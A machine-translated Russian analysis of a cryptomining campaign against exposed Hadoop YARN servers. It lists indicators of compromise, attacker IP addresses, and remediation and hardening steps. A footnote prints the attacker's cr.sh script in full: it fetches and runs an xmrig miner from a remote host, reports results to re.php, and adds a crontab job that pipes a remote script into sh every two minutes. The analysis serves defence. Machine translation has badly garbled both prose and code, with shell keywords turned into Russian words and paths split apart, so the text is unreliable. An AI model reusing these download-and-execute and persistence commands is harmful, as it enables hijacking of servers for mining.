У всех есть возможность подключения портов 22, ssh. Если, однако, они рассматриваются как злонамеренные IP-адреса, например, ссылаясь на то, что сообщается в ссылке https://www. joesandbox.com/index.php/analysis/49178/0/executive, где объявлено использование powershell, обогащая поиск, мы проверяем, что IP-адрес 192.99.142.232 имеет тот же отпечаток, что и IP-адрес 85.214.102.143, расположенный в Германии в наличие провайдера Strato AG. Однако у адреса есть сертификат 443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b, который также привязывает его к следующим IP-адресам: 85.214.125.15 (emma.smartmessaging.com) Debian OS Meter, 85.214.60.153. busware.de) ОС Debian.




от

Отпечатку пальца ssh

Отпечаток пальца tls

192.99.142.232

85.214.102.143

85.214.125.15

85.214.60.153

Что касается IP 192.99.142.248, см. рисунок ниже, который показывает, что было выражено до сих пор в документе.

У вас нет существенных сведений о другом IP-адресе 192.99.142.226

Рекомендации по безопасности

  1. Используйте верхнюю часть, чтобы увидеть процесс и убить ненормальный процесс.

  2. Проверьте каталог / tmp и / var / tmp и удалить i файл как java, ppc, ppl3, config.json и w.conf

  3. Проверьте список мероприятий кронтаб и устранить аномалии

  1. Анализ журналов YARN, подтверждает аномальное применение, устранение обработки.

Укрепление безопасности

  1. Настройте политики доступа через Iptables o группы безопасности для ограничения доступа к портам, таким как 8088;

  2. если нет необходимости, не открывайте интерфейс в общедоступной сети и не изменяйте его в локальных или интрасети;

  3. обновите Hadoop до 2.x и включите аутентификацию Kerberos для предотвращения анонимного доступа.

МОК

Адрес кошелька

4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

MD5

  1. MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc

  2. MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242

  3. MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4

  4. MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853

  5. MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32

  6. MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132

  7. MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6

  8. MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829

Адреса в порядке приоритета

  1. 185.222.210.59 (представляется IP-адресом источника);

  2. 46.30.43.159 (соединение с пуломнарушитель, проколотный слой + tcp);

  3. 179.60.146.10 (соединение с пуломнарушитель, проколотный слой + tcp);

  4. 95.142.40.83 (скачать файл добыча данных);

  5. 95.142.40.81 (скачать файл добыча данных);

  6. 46.30.42.162 (скачать файл добыча данных);

  7. 192.99.142.248 (связь с уклонениями);

  8. 192.99.142.232 (связь с уклонениями);

  9. 192.99.142.226 (связь с уклонениями);

  10. 85.214.102.143 (отпечаток пальца общий с адресами выше);

  11. 85.214.125.15 (отпечаток пальца общий с адресами выше);

  12. 85.214.60.153 (отпечаток пальца общий с вышеупомянутыми адресами).

Адреса подозреваемых, принадлежащих кнарушитель


185.154.52.117 (vz230686.eurodir.ru)

185.154.52.161 (piar60.ru)

185.154.52.181 (vz224405.eurodir.ru)

185.154.52.236 (supportt.ru)

185.154.53.108 (vz224405.eurodir.ru)

185.154.53.137 (vz224405.eurodir.ru)

185.154.53.190 (vz228963.eurodir.ru)

185.154.53.249 (vz232259.eurodir.ru)

185.154.53.46 (server.badstudio.ru)

185.154.53.65 (profshinservice.ru)

185.154.53.67 (vz232259.eurodir.ru)

185.154.53.72 (vz231895.eurodir.ru)

46.30.41.182 (vz230501.eurodir.ru)

46.30.41.207 (vz230806.eurodir.ru)

46.30.41.51 (vz225213.eurodir.ru)

46.30.41.80 (track.dev)

46.30.42.162 (server.com)

46.30.43.128 (vz228757.eurodir.ru)

46.30.45.152 (vz230274.eurodir.ru)

46.30.45.30 (shop.engine)

46.30.45.91 (vz220153.eurodir.ru)

46.30.47.115 (vz227413.eurodir.ru)

46.30.47.157 (vz228859.eurodir.ru)

95.142.39.109 (vz228627.eurodir.ru)

95.142.39.151 (donotopen.ru)

95.142.39.164 (vz232259.eurodir.ru)

95.142.39.172 (hosting-by.wikhost.com)

95.142.39.241 (shimshim.info)

95.142.39.251 (vz232259.eurodir.ru)

95.142.40.188 (vz232259.eurodir.ru)

95.142.40.189 (vz232259.eurodir.ru)

95.142.40.190 (vz232259.eurodir.ru)

95.142.40.44 (vz229990.eurodir.ru)

95.142.40.74 (vz232259.eurodir.ru)

95.142.40.81 (vz228855.eurodir.ru)

95.142.40.82 (vz228856.eurodir.ru)

95.142.40.83 (vz228857.eurodir.ru)

95.142.40.86 (kolos1952.ru)

95.142.40.87 (regiister.ru)

95.142.40.88 (buled.ru)

95.142.40.89 (vz229526.eurodir.ru)

95.142.39.233 (vz231616.eurodir.ru)

185.154.53.46 (server.badstudio.ru)

46.30.47.107 (vz227413.eurodir.ru)

46.30.47.21 (vz227411.eurodir.ru)

46.30.47.35 (vz227411.eurodir.ru)

46.30.47.66 (vz227407.eurodir.ru)

46.30.47.82 (vz227413.eurodir.ru)

95.142.39.102 (vz222177.eurodir.ru)

выводы

Для тех, кто пришел к концу, правильно сделать вывод, подчеркнув, как используются операционные системы стандарт таких как Ubuntu и Windows 7.

Весь процесс также был реплицирован на операционных системах, таких как упомянутые выше, с положительным результатом, и также можно предположить, что устройства IoT.

Я считаю, что очень сложно прервать или даже заметить подобную угрозу, если она адресована IoTs, отсутствие знаний об основных системах, отсутствие безопасности, но прежде всего ограниченные системы безопасности, которые мы можем использовать для управления использованием IoT. ежедневно.

К сожалению, я не проводил никаких тестов ни на одном IoT, поэтому не могу с уверенностью сказать о правильном функционировании всего описанного процесса.

Я хотел бы завершить провокацию, подчеркнув еще один аспект, касающийся использования cryptominer, На самом деле нельзя исключать, что Cyber ​​Crime использует i cryptominer субсидировать кампании вредоносных программ гораздо более сложными, чем те, которые присущи APT12 также родительского происхождения, учитывая возможность самофинансирования с одобрения правительства, для которого работает «хакерская» группа или с кем она сотрудничает. Факторы, связанные с полной анонимностью от операций в домене Cyber, позволяют, высокие поля обман, делая такую ​​деятельность особенно выгодной с точки зрения Интеллекта, благодаря способности легко управлять Операции ложного флага и "адрес«Отнесение к третьим лицам, которые не связаны с ними.

Наконец, окончательное рассмотрение проблемы, связанной с выполнением этих анализов. Трудность, которую читатели могли найти при чтении анализа, является зеркалом сложности ее выполнения, но если вы хотите играть с не маргинальной ролью в кибер-шахматной доске, важно иметь подготовленных и осведомленных людей, способных анализировать и реализовывать средства правовой защиты, необходимые для реальных систем, как правило, намного сложнее, чем тот, который я создал для образовательных целей.

    

1 HDFS: HDFS относится к распределенной файловой системе Hadoop. Это файловая система, созданная с помощью новой технологии с открытым исходным кодом, которая поддерживает иерархическую систему файлов и каталогов, которые распределяются по узлам хранения, управляемым Hadoop. Чтобы узнать больше: https: // www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/

2 REST API: Интерфейс прикладного программирования. Репрезентативный перенос состояний. В целом это признаки разработчика кода, полезные для определения того, как данные, используемые приложением, должны быть переданы.

3 В общем, это называется медовым горшком, когда речь идет о чем-то, созданном специально для привлечения злоумышленника, на практике это ловушка, созданная для того, чтобы убедиться, что злоумышленник обнаружен.

4 Термин «добыча» обычно относится к выполнению вычислений для создания криптовалютности посредством выполнения сложных вычислений.

5 Сканер - это программа, которая автоматически сканирует сеть на наличие уязвимостей.

6 Скрипт - это не что иное, как файл, содержащий последовательность команд.

7 В частности, вы можете четко видеть, как загрузить и запустить вызванный скрипт cr.sh с IP-адреса 185.222.210.59 и вы используете команду sh & отречьсято есть процесс выполняется в экземпляре колотить тока терминала, в фон, но процесс отделен от списка работы di колотить (т.е. процесс не указан как работа в bash на переднем плане /фон); поэтому он используется для удаления / удаления заданий или для указания оболочке не отправлять сигнал HUP с помощью команды отказа от ответственности.

8 pkill -f криптонайт

pkill -f sustes

pkill -f xmrig

pkill -f xmr-stak

pkill -f suppoie

#ps ax | grep / tmp / yarn | grep -v grep | xargs kill -9

Эта часть кода в основном касается процесса обработки данных добыча существующие, документы, подлежащие очистке, процессы, которые должны быть завершены, однако у нас сразу есть важный ключ, cryptonight (мы увидим позже).

WGET = "wget ​​-O"

если [-s / usr / bin / curl];

становятся

WGET = "curl -o";

fi

если [-s / usr / bin / wget];

становятся

WGET = "wget ​​-O";

fi

f2 = "185.222.210.59"

Эта вторая часть проверяет и назначает некоторые переменные, определяет, существуют ли команды виться e Wget и если да, назначьте их переменной WGET, f2 присваивает значение IP.

Фактически, f2 является одним из сервер используется для загрузки файлов, связанных с вредоносными действиями.

downloadIfNeed ()

{

если [! -f / tmp / java]; то

echo "Файл не найден!"

скачать

fi

если [-x "$ (команда -v md5sum)"]

становятся

sum = $ (md5sum / tmp / java | awk '{print $ 1}')

echo $ sum

$ sum дома в

c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)

echo "Java OK"

;;

*)

echo "Java wrong"

sizeBefore = $ (du / tmp / java)

если [-s / usr / bin / curl];

становятся

WGET = "curl -k -o";

fi

если [-s / usr / bin / wget];

становятся

WGET = "wget ​​--no-check-certificate -O";

fi

$ WGET / tmp / java https: // transfer.sh/ixQBE/zzz

sumAfter = $ (md5sum / tmp / java | awk '{print $ 1}')

если [-s / usr / bin / curl];

становятся

echo "повторно загружено $ sum $ sizeBefore после $ sumAfter" `du / tmp / java`> /tmp/tmp.txt

curl -F "file = @ /tmp/tmp.txt" http: //$f2/re.php

fi

;;

ESAC

еще

echo "Нет md5sum"

скачать

fi

}

загрузить () {

f1 = $ (завиток 185.222.210.59 / g.php)

если [-z "$ f1"];

становятся

f1 = $ (wget -q -O - 185.222.210.59 / g.php)

fi

если [`getconf LONG_BIT` =" 64 "]

становятся

$ WGET / tmp / java http: // $ f1 / xmrig_64

еще

$ WGET / tmp / java http: // $ f1 / xmrig_32

fi

}

если [! "$ (ps -fe | grep '/ tmp / java -c /tmp/w.conf' | grep -v grep)"];

становятся

downloadIfNeed

chmod + x / tmp / java

$ WGET /tmp/w.conf http: //$f2/w.conf

nohup / tmp / java -c /tmp/w.conf> / dev / null 2> & 1 &

спать 5

rm -rf /tmp/w.conf

еще

эхо "Бег"

fi

если crontab -l | grep -q "185.222.210.59"

становятся

эхо "Cron существует"

еще

эхо "Cron not found"

LDR = "wget ​​-q -O -"

если [-s / usr / bin / curl];

становятся

LDR = "свернуться";

fi

если [-s / usr / bin / wget];

становятся

LDR = "wget ​​-q -O -";

fi

(crontab -l 2> / dev / null; echo "* / 2 * * * * $ LDR http: // 185.222.210.59/cr.sh | sh> / dev / null 2> & 1") | crontab -

fi

Эта третья часть кода в основном определяет, является ли / tmp / java файлом, который существует и может быть записан, затем определите, соответствует ли значение MD5 одному из значений MD5, содержащихся в коде (мы увидим позже два хэш файл). в скрипт, назначается переменная LDR. Эта переменная используется в основном для загрузки каталога для хранения программ добыча и другие типы, используя команды wget или curl, в зависимости от того, присутствует ли команда в хост-системе. Эта часть кода является ядром кода, загружайте при необходимости (с помощью метода downloadIfNeed) и извлекает в каталоге / tmp renominado в java исполняемый файл для дата добыча (проверка с помощью getconf LONG_BIT, если исполняемый файл должен быть в 32 или 64 бит), загрузите конфигурационный файл w.conf, добавьте разрешения на выполнение программы добыча а затем выполняет команду nohup фон добыча (поЬир Это команда, которая делает игнорировать сигнал SIGHUP, таким образом, чтобы позволить продолжить выполнение даже в случае отключения от терминала или терминал закрытия эмулятора).

Запрограммируйте и удалите файл конфигурации, затем проверьте задачи в crontab, если подходящей задачи нет, она загрузит задачу для запуска скрипта "* / 2 * * * * $ LDR http: // 185.222.210.59/cr .sh | sh> / dev / null 2> & 1 ", где $ LDR - это wget -q -O - или curl (также упомянутый выше), задача запускается каждые две минуты (как показано на рисунке, показывающем варианты полей, определяющих частоту выполнения команды).

Lo скрипт содержит методы загрузки для нескольких вложенных вызовов. Метод ввода - downloadIfNeed. Указав лучше, основной функцией этого метода является проверка MD5 программы даты добыча существующий, если он не может быть проверен или файл не существует, непосредственно вызовите метод загрузки (в соответствии с методом, найденным в скрипт), чтобы загрузить программу добыча Если файл существует, но MD5 не совпадает правильно, вызовите метод загрузки. После повторной проверки, если проверка не удалась, попробуйте загрузить программу для майнинга с другого канала загрузки https: // transfer.sh/WoGXx/zzz и повторите попытку. Наконец, соответствующие результаты передаются на целевой сервер re.php $ f2.

Если оно существует, имя репликации - java.

Метод download () определяет, что система загружает соответствующую версию программы добыча со следующего веб-ресурса: http: // 185.222.210.59/g.php.

Ресурс возвращает другой IP-адрес для загрузки основного исполняемого файла, после завершения загрузки он снова проверяется и копия переименовывается в ppc.

pkill -f logo4.jpg

pkill -f logo0.jpg

pkill -f logo9.jpg

crontab -l | sed '/ logo4 / d' | crontab -

crontab -l | sed '/ logo9 / d' | crontab -

crontab -l | sed '/ logo0 / d' | crontab -

В последней части сценария есть некоторые процессы, файлы, процессы очистки crontab, использование pkill для завершения процесса, который удовлетворяет условиям и устраняет некоторые действия crontab.

9 Информация с открытым исходным кодом

10 https://  community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html oppure https://  stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer

11 Удаленный вызов процедур, является общим механизмом управления приложениями клиент-сервер.

12 Advanced and Persistent Threath, тип атак, обычно выполняемых государственными организациями.

(фото: США)

оборона рейнметалла